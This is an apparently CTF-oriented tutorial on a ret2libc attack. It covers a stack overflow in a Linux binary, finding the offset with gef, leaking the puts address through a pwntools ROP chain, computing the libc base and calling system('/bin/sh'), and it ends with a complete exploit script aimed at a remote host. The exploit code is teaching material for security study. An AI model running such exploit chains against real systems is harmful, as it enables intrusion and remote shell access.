How to perform the attack against the binary with randomized addresses of libaries in memory - ret2libc & pwntools by example.
NOTICE I’m not very experienced in the “offensive RE” ~> pwns. If you will find some mistakes in my explainations, then please let me know in the comments :)
Prerequisites
- exploitable (linux) binary
- python3 + pwntools (I’m using it in virtualenv)
- GDB + gef
# quick install
sudo apt install gdb python3 python3-pip
# install gef (https://github.com/hugsy/gef)
wget -O ~/.gdbinit-gef.py -q http://gef.blah.cat/py
echo source ~/.gdbinit-gef.py >> ~/.gdbinit
# install pwntools in virtualenv (https://docs.pwntools.com/en/stable/)
pip install virtualenv
virtualenv -p python3 venv
. ./venv/bin/activte
pip install pwntools
My exploitable binary have following properties:
gef➤ checksec
[+] checksec for 'binary'
Canary : ✘
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : Full
Hunt for the exploitable code
This tutorial will focus only on binaries with enabled relocation, it will fully ignore the PIE or stack canaries.
The easiest way to find the exploitable code is actually to play with the binary, learn about it’s background. It is worth noticing that exploitable functionality will be triggered from somewhere where binary interacts with the user (receive & parse packets, user input, configs)
In my case the binary have only 4 “input fields” and only one of them allows to overwrite the allocated buffer:
// ida pseudo-code:
int fill()
{
char buf[32]; // [rsp+0h] [rbp-20h] BYREF
memset(buf, 0, sizeof(buf));
printf("How much data do you want to store?\n> ")
read(0, buf, 0x400uLL); // buffer can be overwritten
return printf("\nEnjoy your %s", buf);
}
buf
can handle only 32 bytes, but read
can read 400, so we should be to fully fill the buffer and overwrite the return address. Stack looks like that:
+----------------+
| return addr | <- saved address of return when call fill was exeuted
+----------------+
| stored_rbp | <- saved RBP
+----------------+
| |
| buffer | <- local variables
| |
+----------------+
Protip
ASM
call <func>
is contained from the 2 instructions:push $rip+1, jmp <func>
, so it saves the address of the next instruction and performs jump to the called function.
ret
is analogical, it consists ofpop
&jmp
Prove that you are in control
Next natural step is to verify that we actually can control the rip
registry, the easiest way to achieve that is to run it in gdb with gef installed and generate the pattern:
gef➤ pattern create 60
[+] Generating a pattern of 60 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa
[+] Saved as '$_gef0'
Protip
Generated pattern is using readable characters which are containing unique set of characters which can be easily located in the string for identifying the offset of specified substring.
Then just use generated payload as input data in potentially vulnerable functionality. In my case I had to navigate to the proper menu and paste the payload as choice option. As result the program crashed and gdb handled the exception:
> aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa
Enjoy your aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa
Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x49
$rbx : 0x0
$rcx : 0x0
$rdx : 0x00007ffff7dd18c0 → 0x0000000000000000
$rsp : 0x00007fffffffe278 → "faaaaaaagaaaaaaahaaa\n"
$rbp : 0x6161616161616165 ("eaaaaaaa"?)
$rsi : 0x00007fffffffbbb0 → "Enjoy your aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaa"
$rdi : 0x1
$rip : 0x0000000000400eec → <fill+162> ret
$r8 : 0x49
$r9 : 0x3d
$r10 : 0xffffffc3
$r11 : 0x246
$r12 : 0x00000000004006e0 → <_start+0> xor ebp, ebp
$r13 : 0x00007fffffffe370 → 0x0000000000000001
$r14 : 0x0
$r15 : 0x0
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffe278│+0x0000: "faaaaaaagaaaaaaahaaa\n" ← $rsp
0x00007fffffffe280│+0x0008: "gaaaaaaahaaa\n"
0x00007fffffffe288│+0x0010: 0x0000000a61616168 ("haaa\n"?)
0x00007fffffffe290│+0x0018: 0x0000000000401040 → <__libc_csu_init+0> push r15
0x00007fffffffe298│+0x0020: 0x00007ffff7a05b97 → <__libc_start_main+231> mov edi, eax
0x00007fffffffe2a0│+0x0028: 0x0000000000000001
0x00007fffffffe2a8│+0x0030: 0x00007fffffffe378 → 0x00007fffffffe5eb → "/tmp/binary"
0x00007fffffffe2b0│+0x0038: 0x0000000100008000
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x400ee5 <fill+155> call 0x400670 <printf@plt>
0x400eea <fill+160> nop
0x400eeb <fill+161> leave
→ 0x400eec <fill+162> ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "binary", stopped 0x400eec in fill (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x400eec → fill()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x0000000000400eec in fill ()
Bingo! Program crashed because it tried to jump & execute instructions under the invalid address. Now you can find the address which overwritten return pointer:
gef➤ pattern offset $rsp
[+] Searching '$rsp'
[+] Found at offset 40 (little-endian search) likely
[+] Found at offset 33 (big-endian search)
Protip
We can find the address in
rsp
, because processor failed to executeret
instruction.rip
still points to problematic instruction.
Protip
As argument for pattern offset you can also provide the string or hex number:
gef➤ pattern offset faaaaaaagaaaaaaahaa [+] Searching 'faaaaaaagaaaaaaahaa' [+] Found at offset 40 (big-endian search) gef➤ pattern offset 0x6161616161616166 [+] Searching '0x6161616161616166' [+] Found at offset 40 (little-endian search) likely [+] Found at offset 33 (big-endian search)
Save the found offset (40 in my case), we will need it later.
Develop the exploit (ret2libc)
The ret2libc consists of several simple steps:
- Leak the libc function’s address
- Calculate the address of libc in memory
- Redirect the execution flow to the leaked libc function such as system to execute the /bin/sh
Notice!
All steps needs to be performed during single program execution (due to the randomization). For this you need to have 2 vulnerable functions or just call the vulnerable code twice ;)
PWNtools: quick start
We are going to start from loading binaries (binary and libc) into the pwntools:
import pwn
p = pwn.process('./binary')
#p = pwn.remote("138.68.182.108", 30784)
pwn.context(os='linux', arch='amd64')
#pwn.context.log_level = 'debug'
elf = pwn.ELF("./binary")
libc = pwn.ELF("./libc.so.6")
Protip
If you want to perform this code remotely then uncomment
pwn.remote
(& commentpwn.process
), for debug logs uncommentpwn.context.log_level = 'debug'
.
Now we can pretty easily use the binaries meta information such us stored symbols, etc.
It might happen that vulnerable code is stored behind some menus, for navigation through program you can use several functions:
p.recvuntil("> ") # receive stdout until this substring
p.recv(0xff) # receive n number of bytes
p.recvline() # receive stdout until new line
p.send(b'foo') # send bytes
p.sendline(b'foo') # send 'foo\n' (with new line character)
# optionally use the timeout parameter to wait for output
p.recv(0xff, timeout=0.5)
Leak address
So, now you managed to load the binary, execute it and navigate to vulnerable functionallity.
Now it’s time to create the payload - the easiest way to achieve it is to use ROP module
In the code below I am constructing the ROP chain which will:
- Fill the buffer (32 bytes)
- Overwrite the saved base pointer on stack (8 bytes)
- Call
puts
to leak GOT puts address - Redirect the execution flow to the same, vulnerable function (fill in my case)
- Joins the fill bytes with ROP chain
- Sends the payload
fill = b'A' * 40
rop = pwn.ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(elf.symbols["fill"])
payload = b"".join([fill, rop.chain()])
p.sendline(payload)
Under the hood of
rop.call
In different architectures functions are called using specific call conventions1. For example in linux x8664: 1st argument of function is always passed via
rdi
registry. If we want to to call the function with argument we need to make sure that argument value is stored in the mentioned registry.For that we create the ROP chain which will:
- Jump to the code containing instructions taking the argument from stack and placing it in
rdi
(pop rdi
).- Take address to jump from stack and jump to it (
ret
).In general
rop.call
chain will look like that:<pop rdi; ret addr> <arg> <func_addr>
(pwntools is capable of finding gadgets needed to call the function will all arguments).
PLT vs GOT2
- PLT - Procedure Linkage Table, contain stubs to jump to the target
- GOT - tables of the target addresses (resolved runtime)
You can find these values by yourself:
$ objdump -D ./binary| grep puts 0000000000400650 <puts@plt>: 400650: ff 25 52 19 20 00 jmpq *0x201952(%rip) # 601fa8 <puts@GLIBC_2.2.5> ...
We can interpret above output as:
- PLT address =
0x400650
- GOT entry =
0x601fa8
After sending such prepared payload to the program the stack should look like that:
+----------------+
| ptr_plt_puts | <- pointer to puts function which will be executed
+----------------+
| ptr_got_puts | <- address to entry of puts in GOT, value will be printed by puts above
+----------------+
| ptr_poprdi | <- pointer to pop rdi; ret
+----------------+
| |
| fill | <- our "fill", which just overflows the buffer and saved rbp
| (A*40) |
| |
+----------------+
Now we need to parse the output, this part is individual for each program. I really recommend enabling debugging output which will show transfered data.
Protip - Enable Debug Mode
pwn.context.log_level = 'debug'
# parse leaked address
raw_data = p.recvuntil('\n')
raw_data = raw_data.strip() # \
raw_data = raw_data[-6:] # - skip unnecesary data
leaked_puts = raw_data.ljust(8, b'\x00') # fill missing bytes with zeroes
leaked_puts = pwn.u64(leaked_puts)
Packing and Unpacking the bytes
pwntools contains built-in functions for packing and unpacking bytes - conversion of bytes between the strings and ints according to set environment with
context
function (endianness is set automatically).>>> pwn.p64(0x4142424245464748) b'HGFEBBBA' >>> pwn.u64(b'HEXIFYIT') 6073483730898928968 # 0x5449594649584548
Run /bin/sh
The “last” step consists of the following substeps:
- Calculate the address of libc in memory
- Calculate the address of
system()
function and its argument ("/bin/sh"
) - Prepare the ropchain & pass it as argument
Ok, but why?
You might wondering here why not just call the
system()
directly in the previous step. It seems to be might simpler, than whole play with calling the same function once again.The reason is simple: there is no
system
plt entry in our binary, so we can’t call it:$ objdump -D ./binary| grep 'system' # empty output
We don’t have it in our binary, so we need to find it in the memory by tracing common functions - in our case
puts
.
pwn.info("Stage 2, ret2shell")
# calculate offset, base address of the libc in the memory
libc.address = leaked_puts - libc.symbols['puts']
# prepare the final payload
rop = pwn.ROP(libc)
rop.call(rop.find_gadget(['ret'])) # just for fixing padding, you might not need it
rop.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))]) # with null-byte to make sure that we don't try to execute some /bin/sh appended with garbage like '/bin/shFEFE' which obviously doesn't exists in linux
payload = b"".join([fill, rop.chain()])
p.sendline(payload)
p.interactive()
The last line (p.interactive()
) spawns the interactive shell:
$ ps
PID TTY TIME CMD
26 ? 00:00:00 binary
27 ? 00:00:00 sh
28 ? 00:00:00 sh
Full script
import pwn
#p = pwn.process('./binary')
p = pwn.remote("138.68.182.108", 30784)
pwn.context(os='linux', arch='amd64')
#pwn.context.log_level = 'debug'
elf = pwn.ELF("./binary")
libc = pwn.ELF("./libc.so.6")
pwn.info("Stage 1, leak puts addr")
p.recvuntil(...)
p.sendline(...)
p.recv(...)
# prepare payload
fill = b'A' * 40
rop = pwn.ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(elf.symbols["fill"])
payload = b"".join([fill, rop.chain()])
p.sendline(payload)
p.recvuntil("Enjoy your ")
# extract leaked puts address
raw_data = p.recvuntil('\n')
raw_data = raw_data.strip() # \
raw_data = raw_data[-6:] # - skip unnecesary data
leaked_puts = raw_data.ljust(8, b'\x00') # fill missing bytes with zeroes
leaked_puts = pwn.u64(leaked_puts)
pwn.success(f'Leaked puts: {leaked_puts:x}')
pwn.info("Stage 2, ret2shell")
# calculate offset, base address of the libc in the memory
libc.address = leaked_puts - libc.symbols['puts']
# prepare the final payload
rop = pwn.ROP(libc)
rop.call(rop.find_gadget(['ret']))
rop.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))])
payload = b"".join([fill, rop.chain()])
p.sendline(payload)
pwn.success("Have fun!")
p.interactive()